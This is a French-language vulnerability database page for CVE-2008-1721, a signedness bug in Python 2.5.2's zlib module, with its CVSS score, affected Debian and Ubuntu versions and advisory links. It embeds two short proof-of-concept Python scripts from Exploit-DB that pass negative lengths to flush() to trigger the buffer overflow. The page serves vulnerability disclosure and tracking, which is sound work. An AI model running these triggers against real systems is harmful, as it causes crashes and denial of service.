CVE-2008-1721 : Détail

CVE-2008-1721

10.08%V3
Network
2008-04-10 17:00 +00:00
2018-10-11 17:57 +00:00

Alerte pour un CVE

Restez informé de toutes modifications pour un CVE spécifique.
Gestion des alertes

Descriptions

Integer signedness error in the zlib extension module in Python 2.5.2 and earlier allows remote attackers to execute arbitrary code via a negative signed integer, which triggers insufficient memory allocation and a buffer overflow.

Informations

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-681 Incorrect Conversion between Numeric Types
When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.

Metrics

Metric Score Sévérité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

EPSS Score

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

EPSS Percentile

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 31634

Date de publication : 2008-04-08 22:00 +00:00
Auteur : Justin Ferguson
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/28715/info Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data. An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition. This issue affects Python 2.5.2; other versions may also be vulnerable. python-2.5.2-zlib-unflush-misallocation.py ------------------------------------------ #!/usr/bin/python import zlib msg = """ Desire to know why, and how, curiosity; such as is in no living creature but man: so that man is distinguished, not only by his reason, but also by this singular passion from other animals; in whom the appetite of food, and other pleasures of sense, by predominance, take away the care of knowing causes; which is a lust of the mind, that by a perseverance of delight in the continual and indefatigable generation of knowledge, exceedeth the short vehemence of any carnal pleasure. """ compMsg = zlib.compress(msg) bad = -24 decompObj = zlib.decompressobj() decompObj.decompress(compMsg) decompObj.flush(bad) python-2.5.2-zlib-unflush-signedness.py: ---------------------------------------- #!/usr/bin/python import zlib msg = """ Society in every state is a blessing, but government even in its best state is but a necessary evil in its worst state an intolerable one; for when we suffer, or are exposed to the same miseries by a government, which we might expect in a country without government, our calamities is heightened by reflecting that we furnish the means by which we suffer! Government, like dress, is the badge of lost innocence; the palaces of kings are built on the ruins of the bowers of paradise. For were the impulses of conscience clear, uniform, and irresistibly obeyed, man would need no other lawgiver; but that not being the case, he finds it necessary to surrender up a part of his property to furnish means for the protection of the rest; and this he is induced to do by the same prudence which in every other case advises him out of two evils to choose the least. Wherefore, security being the true design and end of government, it unanswerably follows that whatever form thereof appears most likely to ensure it to us, with the least expense and greatest benefit, is preferable to all others. """ * 1024 compMsg = zlib.compress(msg) bad = -2 decompObj = zlib.decompressobj() decompObj.decompress(compMsg, 1) decompObj.flush(bad)

Products Mentioned

Configuraton 0

Python>>Python >> Version From (including) 2.4.0 To (excluding) 2.4.6

Python>>Python >> Version From (including) 2.5.0 To (including) 2.5.2

Configuraton 0

Debian>>Debian_linux >> Version 4.0

Configuraton 0

Canonical>>Ubuntu_linux >> Version 6.06

Canonical>>Ubuntu_linux >> Version 7.04

Canonical>>Ubuntu_linux >> Version 7.10

Canonical>>Ubuntu_linux >> Version 8.04

References

http://security.gentoo.org/glsa/glsa-200807-01.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/30872
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/28715
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/38675
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/33937
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2008:085
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/37471
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/29955
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2008/dsa-1551
Tags : vendor-advisory, x_refsource_DEBIAN
http://support.apple.com/kb/HT3438
Tags : x_refsource_CONFIRM
http://secunia.com/advisories/31358
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.ubuntu.com/usn/usn-632-1
Tags : vendor-advisory, x_refsource_UBUNTU
http://www.securitytracker.com/id?1019823
Tags : vdb-entry, x_refsource_SECTRACK
http://bugs.python.org/issue2586
Tags : x_refsource_CONFIRM
http://securityreason.com/securityalert/3802
Tags : third-party-advisory, x_refsource_SREASON
http://secunia.com/advisories/31365
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/31255
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2008/dsa-1620
Tags : vendor-advisory, x_refsource_DEBIAN
http://www.vupen.com/english/advisories/2009/3316
Tags : vdb-entry, x_refsource_VUPEN
http://secunia.com/advisories/29889
Tags : third-party-advisory, x_refsource_SECUNIA
Cliquez sur le bouton à gauche (OFF), pour autoriser l'inscription de cookie améliorant les fonctionnalités du site. Cliquez sur le bouton à gauche (Tout accepter), pour ne plus autoriser l'inscription de cookie améliorant les fonctionnalités du site.